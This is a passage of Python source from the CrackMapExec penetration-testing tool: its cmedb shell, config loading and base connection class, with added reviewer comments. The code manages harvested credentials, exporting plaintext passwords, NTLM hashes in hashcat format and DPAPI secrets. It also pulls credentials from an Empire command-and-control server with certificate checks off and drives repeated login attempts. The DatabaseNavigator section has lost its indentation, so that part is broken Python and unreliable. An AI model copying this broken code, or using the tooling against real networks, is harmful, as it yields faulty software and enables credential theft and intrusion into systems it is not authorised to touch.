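    with open(fd, "w", encoding="utf-8") as export_file:
        export_file.writelines(line + "\n" for line in entries)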
def complete_import(text, line):
    """Return tab-completion candidates for the ``import`` command.

    Args:
        text: the word currently being completed.
        line: the whole input line, starting with the command name.

    Returns:
        The remainder of every known import source that starts with what was
        typed after the command name.
    """
    sources = ("empire", "metasploit")
    # Everything after the first space is the argument typed so far.
    _, _, typed = line.partition(" ")
    skip = len(typed) - len(text)
    candidates = []
    for source in sources:
        if source.startswith(typed):
            candidates.append(source[skip:])
    return candidates
def complete_export(text, line):
    """Return tab-completion candidates for the ``export`` command.

    Args:
        text: the word currently being completed.
        line: the whole input line, starting with the command name.

    Returns:
        The remainder of every known keyword that starts with what was typed
        after the command name.
    """
    # NOTE(review): this list differs from the sub-commands handled by
    # DatabaseNavigator.do_export in this file (creds, hosts, shares,
    # local_admins, dpapi, keys, wcc) - confirm which set is intended.
    keywords = (
        "creds",
        "plaintext",
        "hashes",
        "shares",
        "local_admins",
        "signing",
        "keys",
    )
    # Everything after the first space is the argument typed so far.
    _, _, typed = line.partition(" ")
    skip = len(typed) - len(text)
    candidates = []
    for keyword in keywords:
        if keyword.startswith(typed):
            candidates.append(keyword[skip:])
    return candidates
def print_help(help_string):
    """Print ``help_string`` with its common leading whitespace removed."""
    cleaned = dedent(help_string)
    print(cleaned)
class DatabaseNavigator(cmd.Cmd):
def __init__(self, main_menu, database, proto):
cmd.Cmd.__init__(self)
self.main_menu = main_menu
self.config = main_menu.config
self.proto = proto
self.db = database
self.prompt = f"cmedb ({main_menu.workspace})({proto}) > "
def do_exit(self, line):
self.db.shutdown_db()
sys.exit()
@staticmethod
def help_exit():
help_string = """
Exits
"""
print_help(help_string)
def do_back(self, line):
raise UserExitedProto
def do_export(self, line):
if not line:
print("[-] not enough arguments")
return
line = line.split()
command = line[0].lower()
# Need to use if/elif/else to keep compatibility with py3.8/3.9
# Reference DB Function cme/protocols/smb/database.py
# Users
if command == "creds":
if len(line) < 3:
print("[-] invalid arguments, export creds <simple|detailed|hashcat> <filename>")
return
filename = line[2]
creds = self.db.get_credentials()
csv_header = (
"id",
"domain",
"username",
"password",
"credtype",
"pillaged_from",
)
if line[1].lower() == "simple":
write_csv(filename, csv_header, creds)
elif line[1].lower() == "detailed":
formatted_creds = []
for cred in creds:
entry = [
cred[0], # ID
cred[1], # Domain
cred[2], # Username
cred[3], # Password/Hash
cred[4], # Cred Type
]
if cred[5] is None:
entry.append("")
else:
entry.append(self.db.get_hosts(cred[5])[0][2])
formatted_creds.append(entry)
write_csv(filename, csv_header, formatted_creds)
elif line[1].lower() == "hashcat":
usernames = []
passwords = []
for cred in creds:
if cred[4] == "hash":
usernames.append(cred[2])
passwords.append(cred[3])
output_list = [':'.join(combination) for combination in zip(usernames, passwords)]
write_list(filename, output_list)
else:
print(f"[-] No such export option: {line[1]}")
return
print("[+] Creds exported")
# Hosts
elif command == "hosts":
if len(line) < 3:
print("[-] invalid arguments, export hosts <simple|detailed|signing> <filename>")
return
csv_header_simple = (
"id",
"ip",
"hostname",
"domain",
"os",
"dc",
"smbv1",
"signing",
)
csv_header_detailed = (
"id",
"ip",
"hostname",
"domain",
"os",
"dc",
"smbv1",
"signing",
"spooler",
"zerologon",
"petitpotam",
)
filename = line[2]
if line[1].lower() == "simple":
hosts = self.db.get_hosts()
simple_hosts = [host[:8] for host in hosts]
write_csv(filename, csv_header_simple, simple_hosts)
# TODO: maybe add more detail like who is an admin on it, shares discovered, etc
elif line[1].lower() == "detailed":
hosts = self.db.get_hosts()
write_csv(filename, csv_header_detailed, hosts)
elif line[1].lower() == "signing":
hosts = self.db.get_hosts("signing")
signing_hosts = [host[1] for host in hosts]
write_list(filename, signing_hosts)
else:
print(f"[-] No such export option: {line[1]}")
return
print("[+] Hosts exported")
# Shares
elif command == "shares":
if len(line) < 3:
print("[-] invalid arguments, export shares <simple|detailed> <filename>")
return
shares = self.db.get_shares()
csv_header = ("id", "host", "userid", "name", "remark", "read", "write")
filename = line[2]
if line[1].lower() == "simple":
write_csv(filename, csv_header, shares)
print("[+] shares exported")
# Detailed view gets hostname, usernames, and true false statement
elif line[1].lower() == "detailed":
formatted_shares = []
for share in shares:
user = self.db.get_users(share[2])[0]
if self.db.get_hosts(share[1]):
share_host = self.db.get_hosts(share[1])[0][2]
else:
share_host = "ERROR"
entry = (
share[0], # shareID
share_host, # hosts
f"{user[1]}\{user[2]}", # userID
share[3], # name
share[4], # remark
bool(share[5]), # read
bool(share[6]), # write
)
formatted_shares.append(entry)
write_csv(filename, csv_header, formatted_shares)
print("[+] Shares exported")
else:
print(f"[-] No such export option: {line[1]}")
return
# Local Admin
elif command == "local_admins":
if len(line) < 3:
print("[-] invalid arguments, export local_admins <simple|detailed> <filename>")
return
# These values don't change between simple and detailed
local_admins = self.db.get_admin_relations()
csv_header = ("id", "userid", "host")
filename = line[2]
if line[1].lower() == "simple":
write_csv(filename, csv_header, local_admins)
elif line[1].lower() == "detailed":
formatted_local_admins = []
for entry in local_admins:
user = self.db.get_users(filter_term=entry[1])[0]
formatted_entry = (
entry[0], # Entry ID
f"{user[1]}/{user[2]}", # DOMAIN/Username
self.db.get_hosts(filter_term=entry[2])[0][2], # Hostname
)
# Can't modify a tuple which is what self.db.get_admin_relations() returns
formatted_local_admins.append(formatted_entry)
write_csv(filename, csv_header, formatted_local_admins)
else:
print(f"[-] No such export option: {line[1]}")
return
print("[+] Local Admins exported")
elif command == "dpapi":
if len(line) < 3:
print("[-] invalid arguments, export dpapi <simple|detailed> <filename>")
return
# These values don't change between simple and detailed
dpapi_secrets = self.db.get_dpapi_secrets()
csv_header = (
"id",
"host",
"dpapi_type",
"windows_user",
"username",
"password",
"url",
)
filename = line[2]
if line[1].lower() == "simple":
write_csv(filename, csv_header, dpapi_secrets)
elif line[1].lower() == "detailed":
formatted_dpapi_secret = []
for entry in dpapi_secrets:
formatted_entry = (
entry[0], # Entry ID
self.db.get_hosts(filter_term=entry[1])[0][2], # Hostname
entry[2], # DPAPI type
entry[3], # Windows User
entry[4], # Username
entry[5], # Password
entry[6], # URL
)
# Can't modify a tuple which is what self.db.get_admin_relations() returns
formatted_dpapi_secret.append(formatted_entry)
write_csv(filename, csv_header, formatted_dpapi_secret)
else:
print(f"[-] No such export option: {line[1]}")
return
print("[+] DPAPI secrets exported")
elif command == "keys":
if line[1].lower() == "all":
keys = self.db.get_keys()
else:
keys = self.db.get_keys(key_id=int(line[1]))
writable_keys = [key[2] for key in keys]
filename = line[2]
write_list(filename, writable_keys)
elif command == "wcc":
if len(line) < 3:
print("[-] invalid arguments, export wcc <simple|detailed> <filename>")
return
csv_header_simple = (
"id",
"ip",
"hostname",
"check",
"status",
)
csv_header_detailed = (
"id",
"ip",
"hostname",
"check",
"description",
"status",
"reasons"
)
filename = line[2]
host_mapping = {}
check_mapping = {}
hosts = self.db.get_hosts()
checks = self.db.get_checks()
check_results = self.db.get_check_results()
rows = []
for result_id,hostid,checkid,secure,reasons in check_results:
row = [result_id]
if hostid in host_mapping:
row.extend(host_mapping[hostid])
else:
for host_id,ip,hostname,_,_,_,_,_,_,_,_ in hosts:
if host_id == hostid:
row.extend([ip, hostname])
host_mapping[hostid] = [ip, hostname]
break
if checkid in check_mapping:
row.extend(check_mapping[checkid])
else:
for check in checks:
check_id, name, description = check
if check_id == checkid:
row.extend([name, description])
check_mapping[checkid] = [name, description]
break
row.append('OK' if secure else 'KO')
row.append(reasons)
rows.append(row)
if line[1].lower() == "simple":
simple_rows = list((row[0], row[1], row[2], row[3], row[5]) for row in rows)
write_csv(filename, csv_header_simple, simple_rows)
elif line[1].lower() == "detailed":
write_csv(filename, csv_header_detailed, rows)
elif line[1].lower() == "signing":
hosts = self.db.get_hosts("signing")
signing_hosts = [host[1] for host in hosts]
write_list(filename, signing_hosts)
else:
print(f"[-] No such export option: {line[1]}")
return
print("[+] WCC exported")
else:
print("[-] Invalid argument, specify creds, hosts, local_admins, shares, wcc or dpapi")
@staticmethod
def help_export():
    """Print the usage text for the ``export`` command."""
    # NOTE(review): this usage text does not list the "wcc" and "dpapi" export
    # types, although the export command's own error message names them as
    # valid choices. The text looks out of date; confirm and extend it.
    print_help("""
export [creds|hosts|local_admins|shares|signing|keys] [simple|detailed|*] [filename]
Exports information to a specified file
* hosts has an additional third option from simple and detailed: signing - this simply writes a list of ips of
hosts where signing is enabled
* keys' third option is either "all" or an id of a key to export
export keys [all|id] [filename]
""")
def do_import(self, line):
    """Import credentials from an Empire server into the current database.

    Only the argument ``empire`` is handled; anything else is ignored.
    The method logs in to ``/api/admin/login`` with the username/password
    from the ``[Empire]`` config section, fetches ``/api/creds`` with the
    returned token and stores each entry through ``self.db.add_credential``.
    Entries whose credtype is ``token`` or ``krbtgt``, or whose username
    ends in ``$``, are skipped.
    """
    if line != "empire":
        return

    json_headers = {"Content-Type": "application/json"}

    # Pull the username and password from the config file
    login_body = {
        "username": self.config.get("Empire", "username"),
        "password": self.config.get("Empire", "password"),
    }

    # Pull the host and port from the config file
    api_host = self.config.get("Empire", "api_host")
    api_port = self.config.get("Empire", "api_port")
    base_url = f"https://{api_host}:{api_port}"

    try:
        # NOTE(review): verify=False turns off TLS certificate validation on
        # both requests, so the login password sent here and the credential
        # list received below have no protection against an on-path
        # interceptor. Prefer pinning the server certificate / CA bundle.
        # NOTE(review): neither call sets a timeout, so an unresponsive
        # server blocks the shell - presumably these are requests.post/get;
        # confirm against the file's imports.
        login = post(
            base_url + "/api/admin/login",
            json=login_body,
            headers=json_headers,
            verify=False,
        )
        if login.status_code != 200:
            print("[-] Error authenticating to Empire's RESTful API server!")
            return

        # The session token travels as a URL query parameter, which may be
        # recorded in server or proxy access logs.
        listing = get(
            base_url + "/api/creds",
            headers=json_headers,
            params={"token": login.json()["token"]},
            verify=False,
        )

        # The status of this second response is not checked; a body without
        # a "creds" key raises KeyError, which the handler below does not catch.
        for cred in listing.json()["creds"]:
            if cred["credtype"] in ("token", "krbtgt") or cred["username"].endswith("$"):
                continue
            self.db.add_credential(
                cred["credtype"],
                cred["domain"],
                cred["username"],
                cred["password"],
            )
        print("[+] Empire credential import successful")
    except ConnectionError as e:
        print(f"[-] Unable to connect to Empire's RESTful API server: {e}")
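class CMEDBMenu(cmd.Cmd):
    """Top-level ``cmedb`` shell.

    Lets the operator pick a workspace and a protocol database, then hands
    control to that protocol's navigator. The selected workspace and the
    last used protocol are written back to the config file.
    """

    def __init__(self, config_path):
        """Load the config at *config_path* and restore workspace/protocol.

        Exits the process with status 1 if reading the config raises.
        """
        cmd.Cmd.__init__(self)
        self.config_path = config_path

        try:
            self.config = configparser.ConfigParser()
            self.config.read(self.config_path)
        except Exception as e:
            print(f"[-] Error reading cme.conf: {e}")
            sys.exit(1)

        self.conn = None
        self.p_loader = ProtocolLoader()
        self.protocols = self.p_loader.get_protocols()

        self.workspace = self.config.get("CME", "workspace")
        self.do_workspace(self.workspace)

        # Here self.db is the *name* of the last used protocol, not a
        # database handle.
        self.db = self.config.get("CME", "last_used_db")
        if self.db:
            self.do_proto(self.db)

    def write_configfile(self):
        """Rewrite the config file at ``self.config_path`` from memory."""
        # NOTE(review): this file appears to hold service credentials (the
        # Empire import reads a username/password from its config); make
        # sure it is readable by its owner only.
        with open(self.config_path, "w") as configfile:
            self.config.write(configfile)

    def do_proto(self, proto):
        """Open ``<proto>.db`` in the current workspace and run its navigator.

        Does nothing when *proto* is empty or the database file is missing.
        """
        if not proto:
            return

        proto_db_path = path_join(WORKSPACE_DIR, self.workspace, f"{proto}.db")
        if exists(proto_db_path):
            self.conn = create_db_engine(proto_db_path)
            db_nav_object = self.p_loader.load_protocol(self.protocols[proto]["nvpath"])
            db_object = self.p_loader.load_protocol(self.protocols[proto]["dbpath"])
            self.config.set("CME", "last_used_db", proto)
            self.write_configfile()
            try:
                proto_menu = getattr(db_nav_object, "navigator")(self, getattr(db_object, "database")(self.conn), proto)
                proto_menu.cmdloop()
            except UserExitedProto:
                # Raised to leave the protocol menu and return to this shell.
                pass

    @staticmethod
    def help_proto():
        """Print usage for the ``proto`` command."""
        help_string = """
proto [smb|mssql|winrm]
*unimplemented protocols: ftp, rdp, ldap, ssh
Changes cmedb to the specified protocol
"""
        print_help(help_string)

    @staticmethod
    def _is_valid_workspace_name(name):
        """Return True when *name* is a single path component.

        Names with a directory separator, absolute paths, ``.`` and ``..``
        are rejected so a workspace always resolves to a direct child of
        the workspace directory.
        """
        if not name or name in (".", ".."):
            return False
        return os.path.basename(name) == name

    def do_workspace(self, line):
        """Create, list or switch workspaces.

        ``workspace create <name>`` creates and selects a workspace,
        ``workspace list`` prints the existing ones, and ``workspace <name>``
        selects an existing one. An empty argument prints the help text.
        """
        line = line.strip()
        if not line:
            # Return here: joining the workspace directory with an empty name
            # yields a path that exists, which used to select a workspace
            # named "".
            self.help_workspace()
            return

        parts = line.split()
        subcommand = parts[0]

        if subcommand == "create":
            if len(parts) < 2:
                # Previously an IndexError that terminated the shell.
                print("[-] invalid arguments, workspace create <targetName>")
                return
            new_workspace = parts[1].strip()
            if not self._is_valid_workspace_name(new_workspace):
                print(f"[-] Invalid workspace name '{new_workspace}'")
                return
            print(f"[*] Creating workspace '{new_workspace}'")
            try:
                self.create_workspace(new_workspace, self.p_loader, self.protocols)
            except OSError as e:
                # e.g. the workspace directory already exists
                print(f"[-] Unable to create workspace '{new_workspace}': {e}")
                return
            self.do_workspace(new_workspace)
        elif subcommand == "list":
            print("[*] Enumerating Workspaces")
            for workspace in listdir(path_join(WORKSPACE_DIR)):
                if workspace == self.workspace:
                    print("==> " + workspace)
                else:
                    print(workspace)
        elif self._is_valid_workspace_name(line) and exists(path_join(WORKSPACE_DIR, line)):
            self.config.set("CME", "workspace", line)
            self.write_configfile()
            self.workspace = line
            self.prompt = f"cmedb ({line}) > "

    @staticmethod
    def help_workspace():
        """Print usage for the ``workspace`` command."""
        help_string = """
workspace [create <targetName> | workspace list | workspace <targetName>]
"""
        print_help(help_string)

    @staticmethod
    def do_exit(line):
        """Exit the shell by terminating the process."""
        sys.exit()

    @staticmethod
    def help_exit():
        """Print usage for the ``exit`` command."""
        help_string = """
Exits
"""
        print_help(help_string)

    @staticmethod
    def create_workspace(workspace_name, p_loader, protocols):
        """Create the workspace directory and one SQLite file per protocol.

        Raises ``OSError`` (from ``os.mkdir``) when the directory cannot be
        created, for example because it already exists.
        """
        os.mkdir(path_join(WORKSPACE_DIR, workspace_name))

        for protocol in protocols.keys():
            protocol_object = p_loader.load_protocol(protocols[protocol]["dbpath"])
            proto_db_path = path_join(WORKSPACE_DIR, workspace_name, f"{protocol}.db")

            if not exists(proto_db_path):
                print(f"[*] Initializing {protocol.upper()} protocol database")
                conn = connect(proto_db_path)
                try:
                    c = conn.cursor()

                    # try to prevent some weird sqlite I/O errors
                    c.execute("PRAGMA journal_mode = OFF")
                    c.execute("PRAGMA foreign_keys = 1")

                    getattr(protocol_object, "database").db_schema(c)

                    # commit the changes
                    conn.commit()
                finally:
                    # close the connection even when schema creation fails
                    conn.close()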
def delete_workspace(workspace_name):
    """Recursively delete the directory of workspace *workspace_name*."""
    # NOTE(review): the name is joined to WORKSPACE_DIR without validation;
    # an absolute path or a name containing ".." would make rmtree act
    # outside the workspace directory. Callers should pass a plain name.
    workspace_dir = path_join(WORKSPACE_DIR, workspace_name)
    shutil.rmtree(workspace_dir)
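def initialize_db(logger):
    """Ensure the ``default`` workspace and its per-protocol databases exist.

    Creates ``<WS_PATH>/default`` when missing, then creates ``<protocol>.db``
    with that protocol's schema for every protocol whose file is absent.

    :param logger: object with a ``debug`` method, used for progress messages
    """
    default_workspace = path_join(WS_PATH, "default")
    if not exists(default_workspace):
        logger.debug("Creating default workspace")
        os.mkdir(default_workspace)

    p_loader = ProtocolLoader()
    protocols = p_loader.get_protocols()
    for protocol in protocols.keys():
        protocol_object = p_loader.load_protocol(protocols[protocol]["dbpath"])
        proto_db_path = path_join(WS_PATH, "default", f"{protocol}.db")

        if exists(proto_db_path):
            continue

        logger.debug(f"Initializing {protocol.upper()} protocol database")
        conn = connect(proto_db_path)
        try:
            c = conn.cursor()
            # try to prevent some weird sqlite I/O errors
            c.execute("PRAGMA journal_mode = OFF")  # could try setting to PERSIST if DB corruption starts occurring
            c.execute("PRAGMA foreign_keys = 1")
            # set a small timeout (5s) so if another thread is writing to the database, the entire program doesn't crash
            c.execute("PRAGMA busy_timeout = 5000")
            getattr(protocol_object, "database").db_schema(c)
            # commit the changes
            conn.commit()
        finally:
            # close the connection even when schema creation raises, so a
            # failed initialisation does not leak the handle
            conn.close()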
def main():
    """Start the interactive cmedb shell.

    Exits with status 1 when the config file is missing. Ctrl-C inside the
    shell ends it quietly.
    """
    if exists(CONFIG_PATH):
        try:
            CMEDBMenu(CONFIG_PATH).cmdloop()
        except KeyboardInterrupt:
            pass
        return

    print("[-] Unable to find config file")
    sys.exit(1)


if __name__ == "__main__":
    main()
================================================
FILE: cme/config.py
================================================
# coding=utf-8
import os
from os.path import join as path_join
import configparser
from cme.paths import CME_PATH, DATA_PATH
from cme.first_run import first_run_setup
from cme.logger import cme_logger
from ast import literal_eval
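# Shipped defaults, used to back-fill options missing from the user's config.
cme_default_config = configparser.ConfigParser()
cme_default_config.read(path_join(DATA_PATH, "cme.conf"))

cme_config = configparser.ConfigParser()
cme_config.read(os.path.join(CME_PATH, "cme.conf"))

if "CME" not in cme_config.sections():
    # NOTE(review): crackmapexec.py calls first_run_setup(cme_logger) while
    # this call passes no argument - confirm against the function's signature.
    first_run_setup()
    cme_config.read(os.path.join(CME_PATH, "cme.conf"))

# Check if there are any missing options in the config file
for section in cme_default_config.sections():
    # A section that exists only in the defaults has to be created first;
    # ConfigParser.set() raises NoSectionError for an unknown section.
    if not cme_config.has_section(section):
        cme_config.add_section(section)
    for option in cme_default_config.options(section):
        if not cme_config.has_option(section, option):
            cme_logger.display(f"Adding missing option '{option}' in config section '{section}' to cme.conf")
            cme_config.set(section, option, cme_default_config.get(section, option))

# NOTE(review): cme.conf appears to hold service credentials as well (the
# cmedb Empire import reads a username/password from its config); keep the
# file readable by its owner only.
with open(path_join(CME_PATH, "cme.conf"), "w") as config_file:
    cme_config.write(config_file)

#!!! THESE OPTIONS HAVE TO EXIST IN THE DEFAULT CONFIG FILE !!!
cme_workspace = cme_config.get("CME", "workspace", fallback="default")
pwned_label = cme_config.get("CME", "pwn3d_label", fallback="Pwn3d!")
# audit_mode is read as a raw string; process_secret() repeats it as the mask.
audit_mode = cme_config.get("CME", "audit_mode", fallback=False)
reveal_chars_of_pwd = int(cme_config.get("CME", "reveal_chars_of_pwd", fallback=0))
config_log = cme_config.getboolean("CME", "log_mode", fallback=False)
ignore_opsec = cme_config.getboolean("CME", "ignore_opsec", fallback=False)

# host_info_colors is stored as a Python list literal. literal_eval() accepts
# only a string, so the fallback is passed as text (a list fallback raised
# ValueError), and a malformed or wrong-sized value now falls back to the
# built-in list instead of the unparsed default string.
_default_host_info_colors = ["green", "red", "yellow", "cyan"]
try:
    host_info_colors = literal_eval(cme_config.get("CME", "host_info_colors", fallback=repr(_default_host_info_colors)))
except (ValueError, SyntaxError):
    host_info_colors = None

if not isinstance(host_info_colors, (list, tuple)) or len(host_info_colors) != 4:
    cme_logger.error("Config option host_info_colors must have 4 values! Using default values.")
    host_info_colors = list(_default_host_info_colors)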
# this should probably be put somewhere else, but if it's in the config helpers, there is a circular import
def process_secret(text):
    """Return *text* as is, or masked when audit mode is configured.

    With a non-empty ``audit_mode`` setting the result is the first
    ``reveal_chars_of_pwd`` characters of *text* followed by the
    ``audit_mode`` value repeated eight times; the rest of the secret is
    dropped. With audit mode unset the secret is returned unchanged.
    """
    visible_prefix = text[:reveal_chars_of_pwd]
    if audit_mode:
        return visible_prefix + audit_mode * 8
    return text
================================================
FILE: cme/connection.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import random
import socket
from socket import AF_INET, AF_INET6, SOCK_DGRAM, IPPROTO_IP, AI_CANONNAME
from socket import getaddrinfo
from os.path import isfile
from threading import BoundedSemaphore
from functools import wraps
from time import sleep
from ipaddress import ip_address
from cme.config import pwned_label
from cme.helpers.logger import highlight
from cme.logger import cme_logger, CMEAdapter
from cme.context import Context
from impacket.dcerpc.v5 import transport
# Single-slot semaphore: try_credentials() and login() hold it around each
# login call, so only one login attempt runs at a time in this process.
sem = BoundedSemaphore(1)
# Failed-login counters shared by every connection object in the process;
# inc_failed_login() increments them and over_fail_limit() reads them.
global_failed_logins = 0
# Maps username -> number of failed logins recorded for that username.
user_failed_logins = {}
def gethost_addrinfo(hostname):
    """Resolve *hostname* to an address string, trying IPv6 before IPv4.

    For IPv6 results a link-local address is replaced by the canonical
    name. If the IPv6 lookup raises ``socket.gaierror`` the IPv4 lookup is
    used, returning the address or, when that is empty, the canonical name.
    When a lookup yields several results, the last one is returned. An
    error from the IPv4 lookup propagates to the caller.
    """
    try:
        ipv6_results = getaddrinfo(hostname, None, AF_INET6, SOCK_DGRAM, IPPROTO_IP, AI_CANONNAME)
        for _family, _socktype, _proto, canonical, sockaddr in ipv6_results:
            address = sockaddr[0]
            if ip_address(address).is_link_local:
                host = canonical
            else:
                host = address
    except socket.gaierror:
        ipv4_results = getaddrinfo(hostname, None, AF_INET, SOCK_DGRAM, IPPROTO_IP, AI_CANONNAME)
        for _family, _socktype, _proto, canonical, sockaddr in ipv4_results:
            host = sockaddr[0] or canonical
    return host
def requires_admin(func):
    """Decorate a method so it is skipped when ``self.admin_privs`` is False.

    The wrapped method returns ``None`` without calling *func* in that case.
    The test is an identity check against ``False``, so any other value
    (including ``None``) lets the call through.
    """

    @wraps(func)
    def _guarded(self, *args, **kwargs):
        if self.admin_privs is not False:
            return func(self, *args, **kwargs)
        return None

    return _guarded
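def dcom_FirewallChecker(iInterface, timeout):
    """Check whether the DCOM string binding for the target is reachable.

    Scans the interface's string bindings with ``wTowerId == 7`` for one
    whose network address contains the target. If one is found, a transport
    is created for it and a connect/disconnect is attempted.

    :param iInterface: object exposing ``get_cinstance()``, ``get_target()``
        and ``is_fqdn()``
    :param timeout: connect timeout handed to the transport
    :return: ``(True, None)`` when no binding matched, ``(True, binding)``
        when the connection succeeded, ``(False, binding)`` when it failed
    """
    stringBinding = None
    target = iInterface.get_target()

    for strBinding in iInterface.get_cinstance().get_string_bindings():
        if strBinding['wTowerId'] != 7:
            continue

        network_addr = strBinding['aNetworkAddr']
        if network_addr.find('[') >= 0:
            binding, _, bindingPort = network_addr.partition('[')
            bindingPort = '[' + bindingPort
        else:
            binding = network_addr
            bindingPort = ''

        if binding.upper().find(target.upper()) >= 0:
            # Full match: use the advertised address minus its last character.
            stringBinding = 'ncacn_ip_tcp:' + network_addr[:-1]
            break
        elif iInterface.is_fqdn() and binding.upper().find(target.upper().partition('.')[0]) >= 0:
            # Only the first label of the FQDN matched: keep the advertised
            # port but connect to the target name; keep scanning for a full match.
            stringBinding = 'ncacn_ip_tcp:%s%s' % (target, bindingPort)

    if stringBinding is None:
        return True, None

    try:
        rpctransport = transport.DCERPCTransportFactory(stringBinding)
        rpctransport.set_connect_timeout(timeout)
        rpctransport.connect()
        rpctransport.disconnect()
    except Exception:
        # Was a bare ``except:``, which also reported Ctrl-C and interpreter
        # exit as a failed connection instead of letting them propagate.
        return False, stringBinding
    else:
        return True, stringBinding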
class connection(object):
    """Base class driving one protocol session against one target host.

    Constructing an instance runs the whole per-target flow (see
    ``__init__``). Several methods below are stubs that return ``None``;
    presumably protocol-specific subclasses override them. ``self.module``
    and ``self.server`` are not set here - crackmapexec.py attaches them to
    the protocol class before targets are processed.
    """

    def __init__(self, args, db, host):
        """Resolve *host*, optionally sleep for the jitter, then run proto_flow().

        :param args: parsed command-line namespace
        :param db: protocol database object
        :param host: target name or address as given by the user
        """
        self.domain = None
        self.args = args
        self.db = db
        self.hostname = host
        self.conn = None
        self.admin_privs = False
        self.password = ""
        self.username = ""
        self.kerberos = True if self.args.kerberos or self.args.use_kcache or self.args.aesKey else False
        self.aesKey = None if not self.args.aesKey else self.args.aesKey[0]
        self.kdcHost = None if not self.args.kdcHost else self.args.kdcHost
        self.use_kcache = None if not self.args.use_kcache else self.args.use_kcache
        self.failed_logins = 0
        self.local_ip = None
        self.logger = cme_logger

        try:
            self.host = gethost_addrinfo(self.hostname)
            # With Kerberos the name given by the user is kept instead of the resolved address.
            if self.args.kerberos:
                self.host = self.hostname
            self.logger.info(f"Socket info: host={self.host}, hostname={self.hostname}, kerberos={ 'True' if self.args.kerberos else 'False' }")
        except Exception as e:
            # Resolution failure ends construction early: self.host is never
            # set and proto_flow() is not run for this target.
            self.logger.info(f"Error resolving hostname {self.hostname}: {e}")
            return

        if args.jitter:
            jitter = args.jitter
            if "-" in jitter:
                start, end = jitter.split("-")
                jitter = (int(start), int(end))
            else:
                jitter = (0, int(jitter))

            # NOTE(review): range() excludes the upper bound, and an empty
            # range (e.g. a jitter of "0") makes random.choice raise
            # IndexError, which is not caught here.
            value = random.choice(range(jitter[0], jitter[1]))
            self.logger.debug(f"Doin' the jitterbug for {value} second(s)")
            sleep(value)

        try:
            self.proto_flow()
        except Exception as e:
            self.logger.exception(f"Exception while calling proto_flow() on target {self.host}: {e}")

    @staticmethod
    def proto_args(std_parser, module_parser):
        """Stub; returns None here."""
        return

    def proto_logger(self):
        """Stub; does nothing here."""
        pass

    def enum_host_info(self):
        """Stub; returns None here."""
        return

    def print_host_info(self):
        """Stub; returns None here. proto_flow() continues only on a truthy result."""
        return

    def create_conn_obj(self):
        """Stub; returns None here. proto_flow() continues only on a truthy result."""
        return

    def check_if_admin(self):
        """Stub; returns None here."""
        return

    def kerberos_login(
        self,
        domain,
        username,
        password="",
        ntlm_hash="",
        aesKey="",
        kdcHost="",
        useCache=False,
    ):
        """Stub; returns None here."""
        return

    def plaintext_login(self, domain, username, password):
        """Stub; returns None here."""
        return

    def hash_login(self, domain, username, ntlm_hash):
        """Stub; returns None here."""
        return

    def proto_flow(self):
        """Run the per-target sequence: connect, enumerate, log in, then act.

        Modules are called when ``args.module`` is set, otherwise the
        command-line actions are dispatched through call_cmd_args().
        """
        self.logger.debug(f"Kicking off proto_flow")
        self.proto_logger()
        if self.create_conn_obj():
            self.enum_host_info()
            if self.print_host_info():
                # because of null session: with an empty username and
                # password the flow continues even if login() was falsy
                if self.login() or (self.username == "" and self.password == ""):
                    if hasattr(self.args, "module") and self.args.module:
                        self.call_modules()
                    else:
                        self.call_cmd_args()

    def call_cmd_args(self):
        """Call every method of this object whose name matches a set CLI argument.

        An argument counts as set when its value is neither ``False`` nor
        ``None``; the matching method is called without arguments.
        """
        for k, v in vars(self.args).items():
            if hasattr(self, k) and hasattr(getattr(self, k), "__call__"):
                if v is not False and v is not None:
                    self.logger.debug(f"Calling {k}()")
                    r = getattr(self, k)()

    def call_modules(self):
        """Invoke the hooks each loaded module defines, with a fresh Context per module."""
        for module in self.module:
            self.logger.debug(f"Loading module {module.name} - {module}")
            module_logger = CMEAdapter(
                extra={
                    "module_name": module.name.upper(),
                    "host": self.host,
                    "port": self.args.port,
                    "hostname": self.hostname,
                },
            )

            self.logger.debug(f"Loading context for module {module.name} - {module}")
            context = Context(self.db, module_logger, self.args)
            context.localip = self.local_ip

            # Modules with request/response hooks get this connection and
            # its local IP attached to the module server.
            if hasattr(module, "on_request") or hasattr(module, "has_response"):
                self.logger.debug(f"Module {module.name} has on_request or has_response methods")
                self.server.connection = self
                self.server.context.localip = self.local_ip

            if hasattr(module, "on_login"):
                self.logger.debug(f"Module {module.name} has on_login method")
                module.on_login(context, self)

            if self.admin_privs and hasattr(module, "on_admin_login"):
                self.logger.debug(f"Module {module.name} has on_admin_login method")
                module.on_admin_login(context, self)

            # on_shutdown is called here only for modules without request/response hooks.
            if (not hasattr(module, "on_request") and not hasattr(module, "has_response")) and hasattr(module, "on_shutdown"):
                self.logger.debug(f"Module {module.name} has on_shutdown method")
                module.on_shutdown(context, self)

    def inc_failed_login(self, username):
        """Record one failed login for *username* in the per-user, global and per-host counters."""
        global global_failed_logins
        global user_failed_logins

        if username not in user_failed_logins.keys():
            user_failed_logins[username] = 0

        user_failed_logins[username] += 1
        global_failed_logins += 1
        self.failed_logins += 1

    def over_fail_limit(self, username):
        """Return True when any configured failed-login limit has been reached.

        Checks the global limit (``gfail_limit``), this host's limit
        (``fail_limit``) and the per-user limit (``ufail_limit``).
        """
        global global_failed_logins
        global user_failed_logins

        # NOTE(review): the limits are compared with ==, not >=. A counter
        # that moves past its limit without being observed at exactly that
        # value would no longer trip the check, so this account-lockout
        # safeguard depends on being evaluated after every increment.
        if global_failed_logins == self.args.gfail_limit:
            return True

        if self.failed_logins == self.args.fail_limit:
            return True

        if username in user_failed_logins.keys():
            if self.args.ufail_limit == user_failed_logins[username]:
                return True

        return False

    def query_db_creds(self):
        """
        Queries the database for credentials to be used for authentication.
        Valid cred_id values are:
        - a single cred_id
        - a range specified with a dash (ex. 1-5)
        - 'all' to select all credentials
        :return: domain[], username[], owned[], secret[], cred_type[], data[]
        """
        domain = []
        username = []
        owned = []
        secret = []
        cred_type = []
        creds = []  # list of tuples (cred_id, domain, username, secret, cred_type, pillaged_from) coming from the database
        data = []  # Arbitrary data needed for the login, e.g. ssh_key

        for cred_id in self.args.cred_id:
            if isinstance(cred_id, str) and cred_id.lower() == 'all':
                # 'all' replaces whatever earlier ids had collected
                creds = self.db.get_credentials()
            else:
                if not self.db.get_credentials(filter_term=int(cred_id)):
                    self.logger.error('Invalid database credential ID {}!'.format(cred_id))
                    continue
                creds.extend(self.db.get_credentials(filter_term=int(cred_id)))

        for cred in creds:
            c_id, domain_single, username_single, secret_single, cred_type_single, pillaged_from = cred
            domain.append(domain_single)
            username.append(username_single)
